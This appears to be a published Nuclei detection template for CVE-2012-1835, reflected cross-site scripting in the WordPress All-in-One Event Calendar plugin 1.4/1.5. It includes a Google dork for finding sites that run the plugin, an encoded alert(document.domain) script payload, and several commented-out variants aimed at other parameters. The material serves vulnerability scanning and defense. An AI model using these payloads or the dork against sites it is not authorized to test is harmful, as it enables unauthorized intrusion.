WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting
ID: CVE-2012-1835
Severity: medium
Author: daffainfo
Tags: cve,cve2012,wordpress,xss,wp-plugin,timely
Description
Section titled “Description”Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.
YAML Source
Section titled “YAML Source”id: CVE-2012-1835
info: name: WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php. impact: | Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the All-in-One Event Calendar plugin to mitigate the XSS vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-1835 - https://www.htbridge.com/advisory/HTB23082 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-1835 cwe-id: CWE-79 epss-score: 0.00919 epss-percentile: 0.82867 cpe: cpe:2.3:a:timely:all-in-one_event_calendar:1.4:*:*:*:*:*:*:* metadata: max-request: 2 vendor: timely product: "all-in-one_event_calendar" google-query: "inurl:\"/wp-content/plugins/all-in-one-event-calendar\"" tags: cve,cve2012,wordpress,xss,wp-plugin,timelyflow: http(1) && http(2)
http: - raw: - | GET /wp-content/plugins/all-in-one-event-calendar/readme.txt HTTP/1.1 Host: {{Hostname}}
matchers: - type: word internal: true words: - 'All-in-One Event Calendar'
- method: GET path: - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28123%29;%3C/script%3E' # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?args[before_widget]=%3Cscript%3Ealert%28123%29;%3C/script%3E' # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&before_title=%3Cscript%3Ealert%28123%29;%3C/script%3E' # - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=1&after_title=%3Cscript%3Ealert%28123%29;%3C/script%3E'
matchers-condition: and matchers: - type: word part: body words: - "</script><script>alert(document.domain)</script>"
- type: word part: header words: - text/html
- type: status status: - 200# digest: 4a0a00473045022100eea2efda9ad409790d374aece47125e51c5df172e218ae004eb98f929b15fcb002207ce95b62caee6e5cd49fd046e0c269834a482f788628913687726547811410b0:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2012/CVE-2012-1835.yaml"